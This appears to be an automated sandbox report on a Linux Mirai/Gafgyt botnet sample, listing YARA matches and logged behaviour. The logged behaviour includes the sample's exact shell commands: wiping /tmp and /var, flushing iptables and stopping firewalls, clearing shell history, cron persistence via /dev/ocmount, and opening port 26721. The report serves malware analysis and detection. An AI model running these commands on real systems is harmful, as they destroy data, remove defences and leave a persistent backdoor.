      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: classification engineClassification label: mal96.spre.troj.evad.linELF@0/2@49/0

      Data Obfuscation

      barindex
      Manipulation of devices in /dev
      Source: /tmp/x86.elf (PID: 5558)Written: /dev/ocmountJump to behavior

      Persistence and Installation Behavior

      barindex
      Executes the "iptables" command to insert, remove and/or manipulate rules
      Source: /bin/sh (PID: 5850)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
      Source: /bin/sh (PID: 5870)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
      Sample reads /proc/mounts (often used for finding a writable filesystem)
      Source: /bin/fusermount (PID: 5684)File: /proc/5684/mountsJump to behavior
      Sample tries to persist itself using cron
      Source: /bin/sh (PID: 5581)File: /etc/cron.d/mount.shJump to behavior
      Tries to stop the "iptables" service
      Source: /usr/sbin/service (PID: 5527)Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.serviceJump to behavior
      Source: /usr/sbin/service (PID: 5527)Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/php/..Jump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/gdm3/.cacheJump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/gdm3/.cacheJump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/gdm3/.configJump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/gdm3/.configJump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/gdm3/.localJump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/gdm3/.localJump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/snapd/assertions/asserts-v0/..Jump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/snapd/assertions/..Jump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/snapd/..Jump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/colord/.cacheJump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wantsJump to behavior
      Source: /usr/bin/rm (PID: 5494)Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wantsJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1583/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1583/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/2672/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/2672/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/110/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/110/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/111/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/111/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/112/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/112/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/113/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/113/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/234/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/234/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1577/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1577/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/114/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/114/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/235/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/235/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/115/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/115/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/116/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/116/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/117/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/117/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/118/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/118/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/119/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/119/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/10/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/10/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/917/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/917/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/11/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/11/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/12/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/12/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/13/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/13/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/14/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/14/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/15/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/15/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/16/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/16/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/17/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/17/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/18/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/18/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/19/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/19/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1593/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1593/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/240/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/240/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/120/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/120/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/3094/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/3094/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/121/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/121/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/242/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/242/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/3406/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/3406/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/122/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/122/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/243/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/243/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/2/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/2/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/123/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/123/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/244/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/244/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1589/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1589/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/3/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/3/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/124/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/124/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/245/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/245/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1588/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/1588/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/125/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/125/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/4/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/4/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/246/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/246/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/3402/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/3402/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/126/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/126/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/5/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/5/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/247/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/247/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/127/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/127/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/6/statusJump to behavior
      Source: /usr/bin/pkill (PID: 5510)File opened: /proc/6/cmdlineJump to behavior
      Source: /tmp/x86.elf (PID: 5493)Shell command executed: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"Jump to behavior
      Source: /tmp/x86.elf (PID: 5502)Shell command executed: sh -c "rm -rf /tmp/*"Jump to behavior
      Source: /tmp/x86.elf (PID: 5504)Shell command executed: sh -c "iptables -F"Jump to behavior
      Source: /tmp/x86.elf (PID: 5509)Shell command executed: sh -c "pkill -9 busybox"Jump to behavior
      Source: /tmp/x86.elf (PID: 5518)Shell command executed: sh -c "pkill -9 perl"Jump to behavior
      Source: /tmp/x86.elf (PID: 5520)Shell command executed: sh -c "pkill -9 python"Jump to behavior
      Source: /tmp/x86.elf (PID: 5526)Shell command executed: sh -c "service iptables stop"Jump to behavior
      Source: /tmp/x86.elf (PID: 5534)Shell command executed: sh -c "/sbin/iptables -F; /sbin/iptables -X"Jump to behavior
      Source: /tmp/x86.elf (PID: 5538)Shell command executed: sh -c "service firewall stop"Jump to behavior
      Source: /tmp/x86.elf (PID: 5550)Shell command executed: sh -c "history -c"Jump to behavior
      Source: /tmp/x86.elf (PID: 5551)Shell command executed: sh -c "rm -rf ~/.bash_history"Jump to behavior
      Source: /tmp/x86.elf (PID: 5553)Shell command executed: sh -c "history -w"Jump to behavior
      Source: /tmp/x86.elf (PID: 5559)Shell command executed: sh -c "chmod +x /dev/ocmount"Jump to behavior
      Source: /tmp/x86.elf (PID: 5581)Shell command executed: sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"Jump to behavior
      Source: /tmp/x86.elf (PID: 5631)Shell command executed: sh -c /dev/ocmountJump to behavior
      Source: /tmp/x86.elf (PID: 5841)Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
      Source: /tmp/x86.elf (PID: 5854)Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
      Source: /tmp/x86.elf (PID: 5856)Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
      Source: /tmp/x86.elf (PID: 5869)Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
      Source: /tmp/x86.elf (PID: 5872)Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
      Source: /tmp/x86.elf (PID: 5860)Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
      Source: /tmp/x86.elf (PID: 5876)Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
      Source: /tmp/x86.elf (PID: 5878)Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
      Source: /tmp/x86.elf (PID: 5880)Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
      Source: /tmp/x86.elf (PID: 5882)Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
      Source: /bin/sh (PID: 5580)Chmod executable: /usr/bin/chmod -> chmod +x /dev/ocmountJump to behavior
      Source: /bin/sh (PID: 5505)Iptables executable: /usr/sbin/iptables -> iptables -FJump to behavior
      Source: /bin/sh (PID: 5535)Iptables executable: /sbin/iptables -> /sbin/iptables -FJump to behavior
      Source: /bin/sh (PID: 5537)Iptables executable: /sbin/iptables -> /sbin/iptables -XJump to behavior
      Source: /bin/sh (PID: 5850)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
      Source: /bin/sh (PID: 5870)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
      Source: /bin/sh (PID: 5510)Pkill executable: /usr/bin/pkill -> pkill -9 busyboxJump to behavior
      Source: /bin/sh (PID: 5519)Pkill executable: /usr/bin/pkill -> pkill -9 perlJump to behavior
      Source: /bin/sh (PID: 5523)Pkill executable: /usr/bin/pkill -> pkill -9 pythonJump to behavior
      Source: /bin/sh (PID: 5494)Rm executable: /usr/bin/rm -> rm -rf /tmp/config-err-jFiNWb /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-qf3lAyPpWVCU /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-ModemManager.service-OhEyzg /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-colord.service-8ySu1e /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-fwupd.service-iKxwVi /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-switcheroo-control.service-ol8bni /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-logind.service-LPFY4g /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-resolved.service-O3uVvg /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-timedated.service-r702ki /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-upower.service-CBTCVe /tmp/vmware-root_726-2957583432 /tmp/x86.elf /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-ModemManager.service-K5j1Of /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-colord.service-sPszWi /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-fwupd.service-kdgXJf /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-switcheroo-control.service-EvKsMg /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-logind.service-0DTUmj /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-resolved.service-fe4hsi /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-timedated.service-K1ZmQh /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-upower.service-Lb1VUf /var/log/wtmpJump to behavior
      Source: /bin/sh (PID: 5503)Rm executable: /usr/bin/rm -> rm -rf /tmp/*Jump to behavior
      Source: /bin/sh (PID: 5552)Rm executable: /usr/bin/rm -> rm -rf /root/.bash_historyJump to behavior
      Source: /usr/sbin/service (PID: 5527)Systemctl executable: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
      Source: /usr/sbin/service (PID: 5530)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
      Source: /usr/sbin/service (PID: 5532)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
      Source: /usr/sbin/service (PID: 5539)Systemctl executable: /usr/bin/systemctl -> systemctl stop firewall.serviceJump to behavior
      Source: /usr/sbin/service (PID: 5542)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
      Source: /usr/sbin/service (PID: 5544)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
      Source: /usr/bin/chmod (PID: 5580)File: /dev/ocmount (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /bin/sh (PID: 5581)Crontab like entry written: /etc/cron.d/mount.shJump to dropped file
      Source: /tmp/x86.elf (PID: 5558)Writes shell script file to disk with an unusual file extension: /dev/ocmountJump to dropped file
      Source: /usr/sbin/service (PID: 5533)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
      Source: /usr/sbin/service (PID: 5545)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
      Source: submitted sampleStderr: Failed to stop iptables.service: Unit iptables.service not loaded.Failed to stop firewall.service: Unit firewall.service not loaded.sh: 1: history: not foundsh: 1: history: not found: exit code = 0

      Hooking and other Techniques for Hiding and Protection

      barindex
      Sample deletes itself
      Source: /usr/bin/rm (PID: 5494)File: /tmp/x86.elfJump to behavior
      Source: /usr/bin/pkill (PID: 5510)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pkill (PID: 5519)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pkill (PID: 5523)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /bin/busybox (PID: 5855)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/busybox (PID: 5873)Queries kernel information via 'uname': Jump to behavior
